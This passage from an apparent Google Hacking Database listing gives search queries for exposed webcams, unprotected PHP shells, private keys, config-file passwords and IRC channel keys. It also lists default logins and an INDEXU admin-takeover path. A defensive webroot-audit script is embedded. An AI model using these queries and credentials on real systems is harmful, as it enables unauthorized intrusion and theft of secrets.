There is an .htaccess-protected admin page at "http://[target-ip]/config.html" on the target device. Admin logins have no defaults, but are created during setup.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3A%22ViewerFrame%3FMode%3D%22&btnG=Google+Search[url]] [[dork]inurl:"ViewerFrame?Mode="[dork]] [end][348]] [[start][349] [[title]Sony SNC-RZ30 Network Cameras[[title]] [[descr]Sony SNC-RZ30 cameras require a Java-capable browser. The admin panel is found at http://[sitename]/home/l4/admin.html.

[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Asnc-rz30+inurl%3Ahome%2F+&btnG=Search[url]] [[dork]intitle:snc-rz30 inurl:home/ [dork]] [end][349]] [[start][350] [[title]Seyeon FlexWATCH cameras[[title]] [[descr]Seyeon provides various type of products and software to build up a remote video monitoring and surveillance system over the TCP/IP network. FlexWATCH™ Network video server series has built-in Web server based on TCP/IP technology. It also has an embedded RTOS.

The admin pages are at http://[sitename]/admin/aindex.htm.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Aflexwatch+intext%3A%22Home+page+ver%22&btnG=Search[url]] [[dork]intitle:flexwatch intext:"Home page ver"[dork]] [end][350]] [[start][351] [[title]Sony SNC-RZ20 network cameras[[title]] [[descr]Sony SNC-RZ20 cameras: only one result for this cam at the moment, a nice street view from a skyscraper.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3Asnc-z20+inurl%3Ahome%2F+&btnG=Google+Search[url]] [[dork]intitle:snc-z20 inurl:home/ [dork]] [end][351]] [[start][352] [[title]Mobotix netcams[[title]] [[descr]Mobotix netcams use the thttpd 2.x server (http://www.acme.com/software/thttpd/). The latest version today is 2.25b, but most cams run older versions. They produce a rather nice image quality.

Moderator note: this search was found by L0om and cleaned up by Wolveso.[descr]] [[url]http://www.google.com/search?q=%28intext%3A%22MOBOTIX+M1%22+%7C+intext%3A%22MOBOTIX+M10%22%29+intext%3A%22Open+Menu%22+Shift-Reload&btnG=Search[url]] [[dork](intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext:"Open Menu" Shift-Reload[dork]] [end][352]] [[start][353] [[title]Panasonic WJ-NT104 netcams[[title]] [[descr]The Panasonic WJ-NT104 allows easy monitoring with a conventional browser. More vendor information is available at hxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp

[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22WJ-NT104+Main+Page%22&btnG=Search[url]] [[dork]intitle:"WJ-NT104 Main Page"[dork]] [end][353]] [[start][355] [[title]exported email addresses[[title]] [[descr]Loads of user information including email addresses exported in comma-separated file format (.csv). This information may not lead directly to an attack, but most certainly counts as a serious privacy violation.[descr]] [[url]http://www.google.com/search?q=e-mail+address+filetype%3Acsv+csv[url]] [[dork]e-mail address filetype:csv csv[dork]] [end][355]] [[start][356] [[title]phpWebMail[[title]] [[descr]PhpWebMail is a PHP webmail system that supports IMAP or POP3.
It has been reported that PHPwebmail 2.3 is vulnerable.

The vulnerability allows phpWebMail users to gain access to arbitrary files on the file system by changing the parameters in the URL used for sending mail (send_mail.php). More info at http://eagle.kecapi.com/sec/fd/phpwebmail.html.[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&q=filetype%3Aphp+login+%28intitle%3AphpWebMail%7CWebMail%29&btnG=Search[url]] [[dork]filetype:php login (intitle:phpWebMail|WebMail)[dork]] [end][356]] [[start][357] [[title]Invision Power Board SSI.PHP SQL Injection[[title]] [[descr]Invision Power Board is reported prone to an SQL injection vulnerability in its 'ssi.php' script. Due to improper filtering of user-supplied data, 'ssi.php' is exploitable by attackers to pass SQL statements to the underlying database.

The impact of this vulnerability depends on the underlying database. It may be possible to corrupt/read sensitive data, execute commands/procedures on the database server or possibly exploit vulnerabilities in the database itself through this condition.

Version 1.3.1 Final of Invision Power Board is reported vulnerable. Other versions may also be affected as well.

More info: http://www.securityfocus.com/bid/10511/info/[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22Powered+by+Invision+Power+Board%28U%29+v1.3+Final%22&btnG=Search[url]] [[dork]"Powered by Invision Power Board(U) v1.3 Final"[dork]] [end][357]] [[start][358] [[title]Analysis Console for Incident Databases[[title]] [[descr]ACID stands for "Analysis Console for Incident Databases". It is a PHP frontend for the Snort intrusion detection system database.

These pages can be used by attackers to view network attacks that have occurred against the target. Using this information, an attacker can craft an attack and glean network information including vulnerabilities, open ports, IP addresses, network layout, existence of firewall and IDS systems, and more.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=ACID+%22by+Roman+Danyliw%22+filetype%3Aphp&btnG=Search[url]] [[dork]ACID "by Roman Danyliw" filetype:php[dork]] [end][358]] [[start][360] [[title]Comersus.mdb database[[title]] [[descr]Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any programming language. BackOffice+ allows you to define virtually all properties of your on-line store through an intuitive, point-&-click interface.

This search goes directly for one of the MS Access files used by the shopping cart. Searching Google and the well-known security sites for Comersus reveals more security problems.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22%2Fdatabase%2Fcomersus.mdb%22&btnG=Search[url]] [[dork]inurl:"/database/comersus.mdb"[dork]] [end][360]] [[start][361] [[title]Public PHP FileManagers[[title]] [[descr]PHPFM is an open source file manager written in PHP. It is easy to set up for a beginner, but still easy to customize for the more experienced user.

The built-in login system makes sure that only people with the right username and password gain access to PHPFM; however, you can also choose to disable the login system and use PHPFM for public access.

It can currently: create, rename and delete folders; create, upload, rename, download and delete files; edit text files; view image files; sort files by name, size, permissions and last modification date both ascending and descending; communicate in more languages.

This search finds those "public" versions of PHPFM. An attacker can use them to manage his own files (phpshell, anyone?).

PS: thanks to j0hnny for the public access angle :)[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+by+PHPFM%22+filetype%3Aphp+-username&btnG=Search[url]] [[dork]"Powered by PHPFM" filetype:php -username[dork]] [end][361]] [[start][362] [[title]private key files (.key)[[title]] [[descr]This search will find private key files... Private key files are supposed to be, well... private.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=BEGIN+%28CERTIFICATE%7CDSA%7CRSA%29+filetype%3Akey&btnG=Search[url]] [[dork]BEGIN (CERTIFICATE|DSA|RSA) filetype:key[dork]] [end][362]] [[start][364] [[title]private key files (.csr)[[title]] [[descr]This search will find private key files... Private key files are supposed to be, well... private. (Strictly speaking a .csr is a certificate signing request, which carries only the public key; the hits that matter are the ones where the private key was saved under that extension as well.)[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=BEGIN+%28CERTIFICATE%7CDSA%7CRSA%29+filetype%3Acsr&btnG=Search[url]] [[dork]BEGIN (CERTIFICATE|DSA|RSA) filetype:csr[dork]] [end][364]] [[start][365] [[title]PHP Shell (unprotected)[[title]] [[descr]PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbitrary shell commands or browse the filesystem on your remote web server. This replaces, to a degree, a normal telnet connection. You can use it for administration and maintenance of your web site using commands like ps, free, du, df, and more.

If these shells aren't protected by some form of authentication, an attacker will basically *own* the server. This search finds such unprotected phpshells by looking for the keyword "enable stderr".
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22PHP+Shell+*%22+%22Enable+stderr%22+filetype%3Aphp&btnG=Search[url]] [[dork]intitle:"PHP Shell *" "Enable stderr" filetype:php[dork]] [end][365]] [[start][366] [[title]NickServ registration passwords[[title]] [[descr]NickServ allows you to "register" a nickname (on some IRC networks) and prevent others from using it. Some channels also require you to use a registered nickname to join.

This search contains the NickServ response message to a nick registration. Lots of example sites, but some that aren't... you can see in the search which ones are fake (some are like your_password, while others are more realistic). [descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Your+password+is+*+Remember+this+for+later+use%22[url]] [[dork]"Your password is * Remember this for later use"[dork]] [end][366]] [[start][367] [[title]Red Hat Unix Administration[[title]] [[descr]Red Hat UNIX Administration Pages. This search detects the fixed title for the admin pages on certain Red Hat servers. A login is required to access them, but an attacker could use this search to determine the operating system used by the server.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Page+rev+*%2F*%2F*%22+inurl%3A%22admin&btnG=Search[url]] [[dork]intitle:"Page rev */*/*" inurl:"admin[dork]] [end][367]] [[start][374] [[title]PHP application warnings failing "include_path"[title]] [[descr]These error messages reveal information about the application that created them as well as revealing path names, PHP file names, line numbers and include paths.

PS: thanks to fr0zen for correcting the google link for this dork (murfie, 24 jan 2006).[descr]] [[url]http://www.google.com/search?hl=en&q=PHP+application+warnings+failing+%22include_path%22[url]] [[dork]PHP application warnings failing "include_path"[dork]] [end][374]] [[start][375] [[title]inurl:ssl.conf filetype:conf[[title]] [[descr]The information contained in these files depends on the actual file itself. SSL.conf files contain port numbers, ssl data, full path names, logging information, location of authentication files, and more. Other conf files based on this name may contain similar information. Attackers can use this information against a target in various ways.[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Assl%2Econf+filetype%3Aconf[url]] [[dork]inurl:ssl.conf filetype:conf[dork]] [end][375]] [[start][376] [[title]"Internal Server Error" "server at"[title]] [[descr]We have a similar search already, but it relies on "500 Internal Server" which doesn't appear on all errors like this one. It reveals the server administrator's email address, as well as a nice server banner for Apache servers. As a bonus, the webmaster may have posted this error on a forum which may reveal (parts of) the source code.[descr]] [[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Internal+Server+Error%22+%22server+at%22[url]] [[dork]"Internal Server Error" "server at"[dork]] [end][376]] [[start][377] [[title]inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man[[title]] [[descr]LILO is a general purpose boot manager that can be used to boot multiple operating systems, including Linux. The normal configuration file is located in /etc/lilo.conf. Each bootable image can be protected by a password if needed.

Please note that all searches for configuration files will contain at least some false positives.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3Alilo.conf+filetype%3Aconf+password+-tatercounter2000+-bootpwd+-man&btnG=Google+Search[url]] [[dork]inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man[dork]] [end][377]] [[start][378] [[title]filetype:php inurl:"logging.php" "Discuz" error[[title]] [[descr]Discuz! Board error messages related to MySQL. The error message may be empty or contain path information or the offending SQL statement. All discuz! board errors seem to be logged by this php file.

An attacker can use this to reveal parts of the database and possibly launch a SQL attack (by filtering this search including SELECT or INSERT statements).[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aphp+inurl%3A%22logging.php%22+%22Discuz%22+error&btnG=Search[url]] [[dork]filetype:php inurl:"logging.php" "Discuz" error[dork]] [end][378]] [[start][379] [[title]intitle:"Microsoft Site Server Analysis"[title]] [[descr]Microsoft discontinued Site Server and Site Server Commerce Edition on June 1, 2001 with the increasing adoption of its successor, Microsoft Commerce Server 2000 Server and Microsoft Commerce Server 2002. There are still some installations online however.

An attacker may use these reports to gather information about the directory structure and possibly identify script files.[descr]] [[url]http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3A%22Microsoft+Site+Server+Analysis%22&btnG=Google+Search[url]] [[dork]intitle:"Microsoft Site Server Analysis"[dork]] [end][379]] [[start][380] [[title]intitle:"Index of" passwords modified[[title]] [[descr]These directories are named "password." I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named "password" and single html files inside named things like "horny.htm" or "brittany.htm." These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...

Moderator note:

This is a cleanup of a previous googledork, improving the results by using "intitle" and an extra keyword from the index page (in this case 'modified').[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of%22+passwords+modified&btnG=Search[url]] [[dork]intitle:"Index of" passwords modified[dork]] [end][380]] [[start][381] [[title]index.of.password[[title]] [[descr]These directories are named "password." I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named "password" and single html files inside named things like "horny.htm" or "brittany.htm." These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...

Moderator note: This googledork has expired ! See also:

http://johnny.ihackstuff.com/index.php?module=ProdReviews&func=showcontent&id=380[descr]] [[url]http://www.google.com/search?q=inurl:index.of.password&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&start=0&[url]] [[dork]inurl:index.of.password[dork]] [end][381]] [[start][382] [[title]"powered by webcamXP" "Pro|Broadcast"[title]] [[descr]webcamXP PRO:http://www.webcamxp.com/productsadv.html

This is the most advanced version of the software. It has all the features of the other versions (including advanced users management, motion detector, and alerts manager) plus remote administration and external server notification when going offline/online.

[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22powered+by+webcamXP%22+%22Pro%7CBroadcast%22&btnG=Search[url]] [[dork]"powered by webcamXP" "Pro|Broadcast"[dork]] [end][382]] [[start][384] [[title]"ORA-12541: TNS:no listener" intitle:"error occurred"[title]] [[descr]In many cases, these pages display nice bits of SQL code which can be used by an attacker to mount attacks against the SQL database itself. Other pieces of information revealed include path names, file names, and data sources.[descr]] [[url]http://www.google.com/search?q=%22ORA-12541:+TNS:no+listener%22+intitle:%22error+occurred%22&ie=UTF-8&oe=UTF-8[url]] [[dork]"ORA-12541: TNS:no listener" intitle:"error occurred"[dork]] [end][384]] [[start][385] [[title]intitle:"Live View / - AXIS"[title]] [[descr]These AXIS cams seem to run their own http server (Boa/0.94.13). The setup button can be hidden. The devices ship with a default password pair (quoting from the FAQ):

"By default, the username will be ‘root’ and the password will be ‘pass’. If these are not the current values, performing a factory default on the unit will reset the password to ‘pass’."

Some models found in this search:

- AXIS 205 version 4.0x
- AXIS 210 Network Camera version: 4.0x
- AXIS 241S Video Server version: 4.0x
- AXIS 241Q Video Server version 4.0x[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22&btnG=Google+Search[url]] [[dork]intitle:"Live View / - AXIS"[dork]] [end][385]] [[start][386] [[title]"sets mode: +p"[title]] [[descr]This search reveals private channels on IRC as revealed by
IRC chat logs. [descr]] [[url]http://www.google.com/search?q=%22sets+mode:+%2Bp%22&ie=UTF-8&oe=UTF-8[url]] [[dork]"sets mode: +p"[dork]] [end][386]] [[start][387] [[title]"sets mode: +k"[title]] [[descr]This search reveals channel keys (passwords) on IRC, as revealed by published IRC chat logs. [descr]] [[url]http://www.google.com/search?q=%22sets+mode:+%2Bk%22&ie=UTF-8&oe=UTF-8[url]] [[dork]"sets mode: +k"[dork]] [end][387]] [[start][388] [[title]"sets mode: +s"[title]] [[descr]This search reveals secret channels on IRC, as revealed by IRC chat logs. [descr]] [[url]http://www.google.com/search?q=%22sets+mode:+%2Bs%22&ie=UTF-8&oe=UTF-8[url]] [[dork]"sets mode: +s"[dork]] [end][388]] [[start][389] [[title]intitle:"BorderManager Information alert"[title]] [[descr]This is an informational message produced by the Novell BorderManager firewall/proxy server. Attackers can locate perimeter defence systems with this query.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22BorderManager+Information+alert%22&btnG=Search[url]] [[dork]intitle:"BorderManager Information alert"[dork]] [end][389]] [[start][390] [[title]"AnWeb/1.42h" intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?&q=%22AnWeb%2f%31%2e%34%32h%22+intitle%3aindex%2eof[url]] [[dork]"AnWeb/1.42h" intitle:index.of[dork]] [end][390]] [[start][391] [[title]"CERN httpd 3.0B (VAX VMS)"[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity.
Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?q=%22CERN+httpd+3.0B+(VAX+VMS)%22&ie=UTF-8&oe=UTF-8[url]] [[dork]"CERN httpd 3.0B (VAX VMS)"[dork]] [end][391]] [[start][392] [[title]"JRun Web Server" intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22JRun+Web+Server%22+intitle%3Aindex.of&btnG=Search[url]] [[dork]"JRun Web Server" intitle:index.of[dork]] [end][392]] [[start][393] [[title]"MaXX/3.1" intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22MaXX%2F3.1%22+intitle%3Aindex.of&btnG=Search[url]] [[dork]"MaXX/3.1" intitle:index.of[dork]] [end][393]] [[start][394] [[title]"Microsoft-IIS/* server at" intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. 
Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F*+server+at%22+intitle%3Aindex.of&btnG=Search[url]] [[dork]"Microsoft-IIS/* server at" intitle:index.of[dork]] [end][394]] [[start][395] [[title]"Microsoft-IIS/4.0" intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F4.0%22+intitle%3Aindex.of&btnG=Search[url]] [[dork]"Microsoft-IIS/4.0" intitle:index.of[dork]] [end][395]] [[start][396] [[title]"Microsoft-IIS/5.0 server at"[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F5.0+server+at%22&btnG=Search[url]] [[dork]"Microsoft-IIS/5.0 server at"[dork]] [end][396]] [[start][397] [[title]"Microsoft-IIS/6.0" intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. 
Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Microsoft-IIS%2F6.0%22+intitle%3Aindex.of&btnG=Search[url]] [[dork]"Microsoft-IIS/6.0" intitle:index.of[dork]] [end][397]] [[start][401] [[title]"Red Hat Secure/3.0 server at"[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Red+Hat+Secure%2F3.0+server+at%22&btnG=Search[url]] [[dork]"Red Hat Secure/3.0 server at"[dork]] [end][401]] [[start][402] [[title]SEDWebserver * server +at intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=SEDWebserver+*+server+%2Bat+intitle%3Aindex.of&btnG=Search[url]] [[dork]SEDWebserver * server +at intitle:index.of[dork]] [end][402]] [[start][403] [[title]fitweb-wwws * server at intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. 
Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=fitweb-wwws+*+server+at+intitle%3Aindex.of&btnG=Search[url]] [[dork]fitweb-wwws * server at intitle:index.of[dork]] [end][403]] [[start][404] [[title]"httpd+ssl/kttd" * server at intitle:index.of[[title]] [[descr]The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22httpd%2Bssl%2Fkttd%22+*+server+at+intitle%3Aindex.of&btnG=Search[url]] [[dork]"httpd+ssl/kttd" * server at intitle:index.of[dork]] [end][404]] [[start][406] [[title]Xerox Phaser 6250[[title]] [[descr]Base Specifications Phaser 6250N: Letter/Legal Size Color Printer 110V, 26ppm Color/B&W (24ppm A4 Color/B&W), 2400dpi, 700MHz Processor, Ethernet, 256MB Memory, Photo Quality Mode, Network Feature Set

A password is not always needed, it seems; it depends on the admin setup.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Phaser+6250%22+%22Printer+Neighborhood%22+%22XEROX+CORPORATION%22&btnG=Search[url]] [[dork]"Phaser 6250" "Printer Neighborhood" "XEROX CORPORATION"[dork]] [end][406]] [[start][407] [[title]Xerox Phaser® 740 Color Printer[[title]] [[descr]This product is supported but no longer sold by Xerox in the United States. Replacement Product: Phaser™ 6250.

Configuration pages are password protected.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Phaser%C2%AE+740+Color+Printer%22+%22printer+named%3A+%22&btnG=Search[url]] [[dork]"Phaser® 740 Color Printer" "printer named: "[dork]] [end][407]] [[start][408] [[title]Xerox Phaser 8200[[title]] [[descr]Brochure info: "The Phaser 8200 uses solid ink, an alternative technology to laser printing. Unlike typical laser printers, solid ink doesn't require throwaway cartridges to get ink in the printer."

Using the Internet, your printer can send performance information to our computers. PhaserSMART, our diagnostic system, examines the information, diagnoses the issue, and immediately walks you through a proposed solution. Automatic alerts minimize printer management problems. Alerts notify you via email when it's time to replace supplies, or when service is required."

Moderator note: you may not be able to connect to the links Google gives if the printers are turned off when not in use.[descr]] [[url]http://www.google.com/search?q=%22Phaser+8200%22+%22%C2%A9+Xerox%22+%22refresh%22+%22+Email+Alerts%22&filter=0[url]] [[dork]"Phaser 8200" "© Xerox" "refresh" " Email Alerts"[dork]] [end][408]] [[start][409] [[title]Xerox Phaser® 840 Color Printer[[title]] [[descr]This product is supported but no longer sold by Xerox in the United States. Support and supplies for this product continue to be available online. Replacement Product: Phaser™ 8400

This search finds the PhaserLinkTM Printer Management Software for the Phaser® 840 Color Printer. It seems at least the "Print DEMO" page works without authentication.[descr]] [[url]http://www.google.com/search?q=%22Phaser%C2%AE+840+Color+Printer%22+%22Current+Status%22+%22printer+named:%22[url]] [[dork]"Phaser® 840 Color Printer" "Current Status" "printer named:"[dork]] [end][409]] [[start][411] [[title]"adding new user" inurl:addnewuser -"there are no domains"[title]] [[descr]Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail).
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22adding+new+user%22+inurl%3Aaddnewuser+-%22there+are+no+domains%22&btnG=Search[url]] [[dork]"adding new user" inurl:addnewuser -"there are no domains"[dork]] [end][411]] [[start][412] [[title]intitle:"index of" +myd size[[title]] [[descr]The MySQL data directory uses subdirectories for each database and common files for table storage. These files have extensions like: .myd, .myi or .frm.

An attacker can copy these files to his machine and, using a tool like 'strings', possibly view the contents of the database.[descr]] [[url]http://www.google.com/search?num=100&&q=intitle%3A%22index+of%22+%2Bmyd+%2Bsize&btnG=Search[url]] [[dork]intitle:"index of" +myd +size[dork]] [end][412]] [[start][413] [[title]filetype:cnf my.cnf -cvs -example[[title]] [[descr]The MySQL database system uses my.cnf files for configuration. It can include a lot of information, ranging from paths and database names up to usernames and passwords.
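Added example (not from the GHDB or the johnny.ihackstuff.com forum): a small Python audit you can run against your own document root to catch what the .myd (412) and my.cnf (413) searches above, and the .key/.csr (362/364), cookies.txt (422) and user/password CSV (423) searches on this page, would turn up once Google has crawled the site. The rule names, the sample docroot and every file in it are constructed for the example; printable_strings does the part of strings(1) that entry 412 relies on.

```python
# Added example, not GHDB code: audit a web document root for the file types
# the GHDB entries 362/364, 412, 413, 422 and 423 find via Google.
import os
import re
import tempfile
from pathlib import Path

PEM_RE = re.compile(rb"-----BEGIN (RSA |DSA |EC |ENCRYPTED )?PRIVATE KEY-----")
# Header row of a CSV that names a user column and a password/passcode column.
CSV_HEADER_RE = re.compile(rb"(?i)\b(user(name|id)?)\b.*\b(pass(word|code))\b")
MYCNF_PASS_RE = re.compile(rb"(?im)^\s*password\s*=\s*\S+")

def _rule_key(rel, head):
    # A .csr normally holds only a signing request; it is flagged only when a
    # private key block was actually saved under that extension.
    return rel.endswith((".key", ".csr", ".pem")) and bool(PEM_RE.search(head))

def _rule_mysql_files(rel, head):
    return rel.lower().endswith((".myd", ".myi", ".frm"))

def _rule_mycnf(rel, head):
    return os.path.basename(rel) == "my.cnf" and bool(MYCNF_PASS_RE.search(head))

def _rule_cookies(rel, head):
    return os.path.basename(rel).lower() == "cookies.txt"

def _rule_csv_creds(rel, head):
    first_line = head.split(b"\n", 1)[0]
    return rel.lower().endswith(".csv") and bool(CSV_HEADER_RE.search(first_line))

# (GHDB entry number on this page, label, predicate over (relative path, first 4 KiB))
RULES = [
    ("362/364", "private key material", _rule_key),
    ("412", "MySQL table file", _rule_mysql_files),
    ("413", "my.cnf with password", _rule_mycnf),
    ("422", "browser cookie jar", _rule_cookies),
    ("423", "CSV with user/password columns", _rule_csv_creds),
]

def audit_webroot(root):
    """Walk root and return sorted (relative path, GHDB entry) pairs that match a rule."""
    findings = []
    root = Path(root)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        with open(path, "rb") as fh:
            head = fh.read(4096)  # enough for PEM headers and a CSV header row
        for entry, _label, pred in RULES:
            if pred(rel, head):
                findings.append((rel, entry))
    return sorted(findings)

def printable_strings(data, min_len=6):
    """Runs of printable ASCII, i.e. what strings(1) shows for a .MYD file (entry 412)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def build_sample_webroot():
    """Constructed sample docroot; all names and contents are invented for this example."""
    root = Path(tempfile.mkdtemp(prefix="ghdb-audit-"))
    files = {
        "certs/server.key": b"-----BEGIN RSA PRIVATE KEY-----\nMIIB...\n-----END RSA PRIVATE KEY-----\n",
        "db/users.MYD": b"\x00\x01\xfe" + b"alice@example.com" + b"\x00\x00" + b"s3cret-hash" + b"\xff",
        "conf/my.cnf": b"[client]\nuser=root\npassword=changeme\n",
        "old/cookies.txt": b"# Netscape HTTP Cookie File\n",
        "export/members.csv": b"userid,email,password\n1,a@example.com,hunter2\n",
        "docs/readme.csv": b"name,colour\nfoo,red\n",  # harmless CSV, must not match 423
        "index.html": b"<html>hello</html>\n",
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)
    return str(root)

if __name__ == "__main__":
    root = build_sample_webroot()
    for rel, entry in audit_webroot(root):
        print(f"[GHDB {entry}] {rel}")
    print(printable_strings((Path(root) / "db/users.MYD").read_bytes()))
```

The rules only look at names and the first 4 KiB, which is exactly the cheap signal Google's index exposes; point audit_webroot at the real docroot (and at any backup or export directories that are served) rather than at the constructed sample.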

Beware this search still gives false positives (examples, templates).[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acnf+my.cnf+-cvs+-example&btnG=Search[url]] [[dork]filetype:cnf my.cnf -cvs -example[dork]] [end][413]] [[start][415] [[title]Powered by INDEXU[[title]] [[descr]From the sales department: "INDEXU is a portal solution software that allows you to build powerful Web Indexing Sites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to allow you and your members to easily add, organize, and manage your links makes INDEXU the first choice of all webmasters."

(Moderator note: don't believe the marketing talk..)

Some of these servers are not protected well enough. It has been reported that on (rare) occasions this page ->

http://[indexu server]/recovery_tools/create_admin_user.php

indicates admin login is possible by the appearance of three text lines:

Create Administrator Login
Delete old administrator user ....ok
Create new administrator user ....ok

An attacker can then change the URL to -->

http://[target]/admin/index.php and enter:

user=admin
pass=admin

But that's if you find them..[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%2B%22Powered+by+INDEXU%22+inurl%3A%28browse%7Ctop_rated%7Cpower_search%7Chot%7Cbrowse%7Ccreate_admin_user%29+filetype%3Aphp&btnG=Sea[url]] [[dork]+"Powered by INDEXU" inurl:(browse|top_rated|power_search|hot|browse|create_admin_user) filetype:php[dork]] [end][415]] [[start][416] [[title]("Indexed.By"|"Monitored.By") hAcxFtpScan[[title]] [[descr]hAcxFtpScan - software that use 'l33t h@x0rz' to monitor their file stroz on ftp. On the ftp server usualy it is a directory like:

/Monitored.By.hAcxFtpScan/
/Indexed.By.hAcxFtpScan/

